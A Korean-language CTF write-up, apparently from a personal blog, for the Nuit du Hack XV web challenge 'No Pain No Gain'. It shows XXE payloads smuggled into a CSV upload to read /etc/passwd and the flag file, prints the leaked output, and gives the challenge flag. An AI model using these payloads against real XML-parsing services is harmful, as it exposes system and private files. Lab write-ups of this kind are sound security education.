shpik's world!

[Nuit du hack XV Qual] No Pain No Gain - 75 pts

0x400 CTF

No Pain No Gain

 Challenge validated!

Description

Uploading a CSV file that will be processed to HTML. The purpose of this challenge is to catch the flag file.


Details

Points
75
Category
Web
Validations
81
Url
http://nopainnogain.quals.nuitduhack.com/

Attachments

This challenge has no attachment.


주말에 Nuitduhack CTF에 참가하였습니다.


이 문제 페이지는 아래와 같습니다.


Please upload a CSV file like this:
<!-- Invitations --> 
id,name,email 
1,name1,email1@mail.com 
2,name2,email2@mail.com
Select file
Submit


위와 같이 단순한 구성입니다.


이제 csv를 위의 예제와 같이 만들어 업로드를 해보았습니다.

<!-- Invitations -->
id,name,email
1,name1,email1@mail.com
2,name2,email2@mail.com 
IDNameEmail
1name1email1@mail.com
2name2

email2@mail.com


위와 같은 결과가 나옴을 확인할 수 있다.


이제 다음과 같이 업로드를 하면 에러를 확인할 수 있다.

<!-- Invitations -->
id,name,email
<code>,name1,email1@mail.com
2,name2,email2@mail.com 

Could not convert the CSV to XML!
Please follow the example above.


업로드 된 CSV은 XML로 변경되어지고 변경된 XML을 파싱하여 화면에 보여주는 문제이다.


이제 XXE 취약점을 이용하여 플래그를 구하였다.


<!DOCTYPE root[<!ENTITY foo SYSTEM "file:///etc/passwd">]>
id,name,email
1,name1,&foo;
2,name2,email2@mail.com
IDNameEmail
1name1root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false flag:x:1000:1000::/home/flag:/bin/sh
2name2email2@mail.com


flag라는 유저가 존재하였고, /home/flag/flag에 존재하리라 예측하여 아래와 같은 csv파일을 업로드하였다.

<!DOCTYPE root[<!ENTITY foo SYSTEM "file:///home/flag/flag">]>
id,name,email
1,name1,&foo;
2,name2,email2@mail.com
IDNameEmail
1name1

NDH{U3VwZXIgTWFyaW8gQnJvcw0K44K544O844OR44O844Oe44Oq44Kq44OW44Op44K244O844K6DQpTxatwxIEgTWFyaW8gQnVyYXrEgXp1DQrYs9mI2KjYsdmF2KfYsdmK2Yg=}

2name2email2@mail.com




Flag is 

NDH{U3VwZXIgTWFyaW8gQnJvcw0K44K544O844OR44O844Oe44Oq44Kq44OW44Op44K244O844K6DQpTxatwxIEgTWFyaW8gQnVyYXrEgXp1DQrYs9mI2KjYsdmF2KfYsdmK2Yg=}